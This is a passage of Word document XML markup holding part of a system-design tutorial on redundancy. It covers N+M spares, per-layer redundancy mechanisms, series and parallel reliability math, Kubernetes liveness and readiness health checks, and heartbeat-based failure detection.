    <w:p w14:paraId="4C9D6617" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N+M Redundancy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D62668F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53054C7F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>N instances handle normal load. M spare instances handle failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D548818" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="7EF5C008" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>N=10 servers handle traffic. M=2 spare servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D4DF67" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>If 1 server fails: spare absorbs its load. 11 servers → 10 active.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B4CDB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>If 2 servers fail: both spares activated. 10 active still.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C10509E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>If 3 servers fail: only 9 servers remain — degraded capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F175D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="3241CA83" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Cost-efficient: don't need 2x resources (just N + a few spares).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2102D989" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Redundancy at Every Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05601D5D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53531BED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>┌─────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36633435" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Layer          │ Redundancy Mechanism                             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D69851" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419E24B5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ DNS            │ Multiple NS records, GeoDNS, failover zones     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF2FFF4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Load Balancer  │ Active-passive pair (VRRP), multiple LBs        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0752296F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Application    │ Multiple instances behind LB, auto-scaling      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760C291D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Database       │ Primary + replicas, multi-AZ, failover          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B923AAA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Cache          │ Redis Sentinel/Cluster, multiple replicas       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E172C9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>│ Message Queue  │ Kafka ISR, RabbitMQ mirroring                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFD597E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Storage        │ RAID, replication factor, erasure coding         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F13C3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Network        │ Dual NICs, multiple paths, BGP multi-homing     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E85E346" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Power          │ Dual power supplies, UPS, generator backup      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216CE08E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Datacenter     │ Multiple AZs, multiple regions                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EF5F41" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>└─────────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42263F3E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 The Reliability Math</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50550650" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E00E44" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Single component reliability: R = 0.999 (99.9%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7690336C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Probability of failure: F = 1 - R = 0.001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1511A595" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="6109F59B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Series (ALL must work — single chain):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56202927" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  System = R₁ × R₂ × R₃ = 0.999³ = 0.997 (99.7%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD7A1F3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Adding components in series DECREASES reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6CA685" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="3C3CFB7B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Parallel (ANY one working suffices — redundancy):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A887C3F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  System = 1 - (F₁ × F₂ × F₃) = 1 - 0.001³ = 0.999999999 (nine 9s!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31133935" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Adding components in parallel INCREASES reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49866232" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="4371FDFE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Real systems are Series-Parallel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0729CD59" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Request → [LB (2 parallel)] → [App (3 parallel)] → [DB (2 parallel)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B77B2A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFCDE10" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  LB: 1 - (0.001)² = 0.999999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DFE38F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  App: 1 - (0.001)³ = 0.999999999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79298CF5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  DB: 1 - (0.001)² = 0.999999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A11930E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  System: 0.999999 × 0.999999999 × 0.999999 ≈ 0.999998 (99.9998%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F436A43" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="083309B7">
          <v:rect id="_x0000_i6347" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78504E93" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Fault Detection — Knowing Something Is Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE34D1F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Health Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A127182" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Liveness checks (is the process alive?):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50995A7F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631A4E9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>GET /health → 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59905243" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Process is running, can handle HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B0C975" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Doesn't guarantee correctness — just "not dead."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692D3D4E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0795D532" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Kubernetes liveness probe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A209C4F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  If fails → kubelet KILLS the pod and restarts it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70193E90" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  "Something is fundamentally wrong — restart the process."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13821F8A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Readiness checks (can it serve traffic?):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0200A31D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7E48EE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>GET /ready → 200 OK (or 503 if not ready)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C0B18D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Process is running AND ready to handle real traffic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B682599" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    - Database connection established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05771AFA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    - Caches warmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4552ABBB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    - Dependencies reachable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9306A5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16729606" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Kubernetes readiness probe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F232DB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  If fails → pod removed from Service endpoints (no traffic routed to it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A95CAC3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  "Temporarily unable to serve — don't send requests until recovered."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F904E16" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deep health checks (is the system correct?):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E10AB7C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408F99E0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>GET /health/deep → performs actual operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600EFA71" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Reads from database (verifies connectivity + auth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AAB99C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Writes to cache (verifies write path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659F7979" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Calls downstream dependency (verifies integration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32041510" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Returns latency of each check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A8D530" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25076C21" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Caution: Don't put expensive checks here. They run every 10-30 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CBF1BA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Caution: Don't cascade failures (deep check failing shouldn't cause health check failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330527D7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">           for a non-critical dependency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D63094" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Heartbeats and Failure Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1296ED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2734D0ED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Heartbeat mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303FCADF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Node A sends "I'm alive" to monitor every T seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A569E63" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Monitor expects heartbeat within T + tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0806F97C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  If no heartbeat for T_timeout → declare node suspected dead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9DC265" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="553766F2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>The timeout tradeoff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49752BFA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Short timeout (1 second):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24FC66" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    + Fast detection (failures caught quickly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F3A215" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    - False positives (GC pause, network blip → incorrectly declared dead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759DCEFA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421A345F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Long timeout (30 seconds):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257FB8E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    + Few false positives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A1E4D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    - Slow detection (30 seconds of serving errors before failover)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10492DCB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="626E8998" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Adaptive failure detectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A17A67" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Phi Accrual Detector (Cassandra): uses heartbeat history to compute a "suspicion level"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE18C0C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    rather than a binary alive/dead threshold.</w:t>
      </w:r>
    </w:p>
